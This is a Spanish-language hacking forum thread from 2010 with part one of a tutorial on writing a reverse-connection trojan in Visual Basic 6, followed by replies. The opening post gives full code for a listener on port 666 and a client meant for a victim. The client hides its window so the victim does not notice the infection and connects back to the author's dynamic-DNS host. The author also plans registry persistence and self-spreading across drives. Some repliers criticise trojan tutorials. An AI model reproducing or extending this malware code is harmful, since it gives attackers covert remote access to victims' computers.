Crea tu propio troyano en VB (Conexion inversa) (Parte 1)

Iniciado por abrahametalero, 4 Abril 2010, 21:49 PM

0 Miembros y 1 Visitante están viendo este tema.

abrahametalero

Bueno pues ahora les vengo mostrando como hacer su propio tutorial para que ya no sean unos lammer'sillos :P...
Dejar de usar las tools de otras personas y hacer las nuestras...
Dar nuestro siguiente paso.
Pues lo que haremos sera hacer un troyano de conexion inversa... ¿Que quiere decir esto? que la computadora infectada se conecte a la nuestra ¿Porque? porque hasi es mucho mejor, si nosotros hacemos un troyano normal, nosotros tendriamos que saber el ip de la victima... y oviamente no vamos a andar preguntando ¿Cual es tu ip... para hackearte?, pues lo que haremos nosotros sera que su computadora se conecte a la nuestra atraves de nuestra ip, ¿Pero que pasa si cambiamos nuestra ip? pues si cambias tu ip es como si ya no tuvieras a la persona infectada, porque el troyano se seguiria conectando a la ip que nosotros le pusimos por eso usaremos un No-Ip si no saben como usar el No-Ip busquense un tutorial, yo no voy a andar hasiendo tutoriales de cosas que no vienen al caso xD!.

Comenzemos!

Bueno abirmos nuestro Visual Basic y le ponemos un diseño cualquiera, no importa como se vea, si no lo que importa es lo que hace(6), ponemos 4 label's... mi forma se ve algo como esto:

Son 4 labels... el primero dice "Estado:" y alado hay otro label para que muestre si esta conectado o desconectado el troyano, el otro label dice "IP:" para que en el otro label muestre cual es la ip de la victima.
Ahora vamos a agregar la parte mas importante de todo el progama.... el Winsock... para agregarlo agamos lo siguiente:

Vallamos a proyecto > Componentes
O Precionando Ctrl + T

Y nos saldra la siguiente ventana:

Busquemos "Microsoft Winsock Control 6.0" y lo seleccionamos, ahora damos aceptar y ya tenemos el componente en nuestra barra de herramientas:

Ahora la ponemos en la forma, no importa en que parte ya que en tiempo de ejecucion no se vera.

En el Form Load Agregamos el Siguiente codigo:
Private Sub Form_Load()
On Error Resume Next
Winsock1.Close
Winsock1.LocalPort = 666
Winsock1.Listen
End Sub


Explicacion:

"On Error Resume Next" esta instruccion es por si el programa tiene algun probleca con alguna de las siguientes funciones, que no marque error y se cierre, lo que hace es que continua con la siguiente funcion.

"Winsock1.Close" Winsock1 es el nombre de nuestro winsock y la propiedad "Close" es para cerrar todas las conexiones abiertas, esto se hace por si hay alguna conexion establecida cerrarla para abrirla nuevamente.

"Winsock1.LocalPort = 666" la propiedad "LocalPort" asigna un puerto en especial para la conexion, 666 es el puerto que deseamos asignar, le podemos poner el que sea pero tiene que ser el mismo que le pongamos a la otra forma.

"Winsock1.Listen" Pone a la escucha nuestro winsock para que en cualquier momento nuestras victimas se puedan conectar a nosotros.

Ahora vamos a agregar el siguiente codigo:
Private Sub winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
Label4.Caption = Winsock1.RemoteHostIP
Label2.Caption = "Conectado"
End Sub


Explicacion:

"winsock1_ConnectionRequest" esto quiere decir que cuando nos manden la señal de que se quieren conectar a nuestra pc (Nuestra victima) entonces.....

"Winsock1.Close" Cierra las conexiones anteriores para conectar una nueva.

"Winsock1.Accept requestID" acepta la conexion de la pc infectada.

"Label4.Caption = Winsock1.RemoteHostIP" Le ponemos al label4 la ip de la victima.

"Label2.Caption = "Conectado"" Le ponemos al label2 "Conectado" para que sepamos cuando estamos conectados.

Agregamos tambien esto:
Private Sub Winsock1_Close()
Label2.Caption = "Desconectado"
Label4.Caption = " "
End Sub


Explicacion:

"Winsock1_Close" Esta funcion es para cuando se cierre la conexion...

"Label2.Caption = "Desconectado"" En el label2 ponemos "Desconectado" para saber cuando se desconecta la victima.

"Label4.Caption = " "" Para no tener ningun valor en donde es la ip.

Y pueden creerlo.... con esto ya tenemos la mitad del troyano... claro sin ninguna funcion... lo unico que hace nuestro troyano hasta ahora es tomar las conexiones que nos pidan... pero... cuales

conexiones vamos a tomar si de ningun lado nos la van a pedir??? agamos que nos la pida la victima..
Entonces agamos lo siguiente:

La Segunda Parte!
Antes que nada guarden el proyecto anterior y abran uno nuevo...
Este va a ser el que le enviaremos a la victima para que se conecte a nuestra ip.
Agregamos el componente WinSock nuevamente y lo agregamos a nuestra forma.
OJO... NUESTRA FORMA NO NECESITA UN DISEÑO CON ESTILO, LA VICTIMA NO LO VERA HASI QUE NO SE PREOCUPEN.

En el Form_Load Agregamos el siguiente codigo:
On Error Resume Next
Me.Hide
Winsock1.Close
Winsock1.Connect "TU NO-IP O TU IP", 666


Explicacion:

"On Error Resume Next" Si hay error segir corriendo el programa.

"Me.Hide" Para que la victima no vea nuestro programa, para que no se de cuenta de que esta infectado.

"Winsock1.Close" Cierra todas las conexiones anteriores.

"Winsock1.Connect "TU NO-IP O TU IP", 666" esta es la funcion que hace que la pc del infectado se conecte a nuestra ip, de preferencia haste un NO-IP para que no se pierda la conexion. En 666 es el puerto asignado en la forma anterior, le puedes poner el puerto que quieras pero debe estar igual en las 2 formas.

Y pueden Creerlo?? ya tenemos nuestro troyano.... CON ESTO LA PC DEL INFECTADO SE CONECTA A NUESTRA PC!!
Claro no tiene ninguna funcion nuestro troyano pero ya hisimos que se conectara a nosotros.

El codigo completo de la primera forma es:
Private Sub Form_Load()
On Error Resume Next
Winsock1.Close
Winsock1.LocalPort = 666
Winsock1.Listen
End Sub

Private Sub Winsock1_Close()
Label4.Caption = " "
Label2.Caption = " "
End Sub

Private Sub winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
Label4.Caption = Winsock1.RemoteHostIP
Label2.Caption = "Conectado"
End Sub


Y el codigo completo de la segunda forma es:
Private Sub Form_Load()
On Error Resume Next
Me.Hide
Winsock1.Close
Winsock1.Connect "abrahametalero.sytes.net", 666
Label1.Caption = "Conectando"
If Err Then Exit Sub
End Sub

(Por ahora esto es todo el codigo)
Agamos la prueba si funciona...
yo le puse que se conectara a mi no-ip.....

Ejecutemos nuestras 2 formas
Primero ejecutemos la nuestra... en la que recivimos la conexion.

Cuando abri la forma que pide la conexion... al instante se puso lo siguiente en la que la recive...

Esto quiere decir que si funciona nuestro troyano....

Despedida
Bueno por ahorita ya estoy un poco cansado...
hasi que para despues les digo como agregar muchas mas funciones, como hacer que se agrege al registro, se autocopie y se expanda por todos los discos duros....
Les prometo hacer otro tutorial de como ponerle funciones si comentan y votan :D:D.....

Espero averles explicado bien... si no les explique bien aganmelo saber para explicarles todo lo que necesiten.
Cualquier cosa comenten.
-------------------------------------------------------------
-------------------------------------------------------------
Greatz: IpKiss & w0rm  &  Maztor  &   LinuxFer
-------------------------------------------------------------
-------------------------------------------------------------
abrahametalero.diosdelared.com <---- mi blog... <---- tutoriales programacion y ing. inversa.

BlackZeroX

Cita de: abrahametalero en  4 Abril 2010, 21:49 PM
Y el codigo completo de la segunda forma es:
Private Sub Form_Load()
On Error Resume Next
Me.Hide
Winsock1.Close
Winsock1.Connect "abrahametalero.sytes.net", 666
Label1.Caption = "Conectando"
If Err Then Exit Sub
End Sub

(Por ahora esto es todo el codigo)
Agamos la prueba si funciona...
yo le puse que se conectara a mi no-ip.....


Esto causa Grasia... quiso Ocultar su DNS pero se nota en el Codigo que puso... de hecho tambien en la Imagen en el Log del DUC.

Dulces Luanas!¡.
The Dark Shadow is my passion.

abrahametalero

no hay problema uso proxy y ese no-ip nadamas lo use para el tutorial :P
abrahametalero.diosdelared.com <---- mi blog... <---- tutoriales programacion y ing. inversa.

ChAkAL500

No hay que fijarse en esas cosas....
Muy buen trabajo abrahametalero yo te animo a que sigas. En cuanto tenga algo de tiempo lo probaré
Bender: Y a pesar de que el ordenador estaba apagado y desenchufado, una imagen permanecía en la pantalla... era... ¡¡el logotipo de Windows!!

abrahametalero

muchas gracias... ya estoy hasiendo la segunda parte... como en 1 hora lo acabo aproximandamente.... y lo subo....
Ese tipo de cometarios es los que me animan a seguir ;);)
abrahametalero.diosdelared.com <---- mi blog... <---- tutoriales programacion y ing. inversa.

Karcrack

Te agradecemos el esfuerzo, pero yo soy muy pesimista respecto a esto de los tutoriales para hacer este tipo de herramientas (Troyanos, Keyloggers, Crypters...) en mi opinion solo atraen a gente que quiere aprender a hacer las cosas en 1/2 hora, y que cuando quieran hacer que """su""" troyano cierre un proceso estarán molestando en los foros porque no saben hacer nada sin un tutorial paso a paso...

En resumen, que atrae a ""programadores"" comodones, que lo preguntaran TODO...

Saludos, repito gracias por el esfuerzo ;)

seba123neo

Cita de: Karcrack en  5 Abril 2010, 01:17 AM
Te agradecemos el esfuerzo, pero yo soy muy pesimista respecto a esto de los tutoriales para hacer este tipo de herramientas (Troyanos, Keyloggers, Crypters...) en mi opinion solo atraen a gente que quiere aprender a hacer las cosas en 1/2 hora, y que cuando quieran hacer que """su""" troyano cierre un proceso estarán molestando en los foros porque no saben hacer nada sin un tutorial paso a paso...

En resumen, que atrae a ""programadores"" comodones, que lo preguntaran TODO...

Saludos, repito gracias por el esfuerzo ;)

mejor no lo podias haber dicho, vos sabes que me leiste la mente, iba a decir lo mismo, pero seguro yo iba a ser mas duro, viste como soy con estos temas... :xD
La característica extraordinaria de las leyes de la física es que se aplican en todos lados, sea que tú elijas o no creer en ellas. Lo bueno de las ciencias es que siempre tienen la verdad, quieras creerla o no.

Neil deGrasse Tyson

abrahametalero

#7
aaaa me caga la gente hasi ¬¬' no saben todo lo que me costo hacer el tutorial.... pero no se preocupen a este foro no vuelvo a subir mis tutoriales..... si quieren ver la segunda parte metanse a mi blog .... (Aquí no se spammea con blogs)
abrahametalero.diosdelared.com <---- mi blog... <---- tutoriales programacion y ing. inversa.

Darioxhcx

Cita de: abrahametalero en  5 Abril 2010, 01:55 AM
aaaa me caga la gente hasi ¬¬' no saben todo lo que me costo hacer el tutorial.... pero no se preocupen a este foro no vuelvo a subir mis tutoriales..... si quieren ver la segunda parte metanse a mi blog .... abrahametalero.SPAM(137)
te lo dijeron de la mejor manera posible bro , no ahi por que enojarse xD
no estamos en elemo.net :P

abrahametalero

para mañana subire la segunda parte en mi blog \/
abrahametalero.diosdelared.com <---- mi blog... <---- tutoriales programacion y ing. inversa.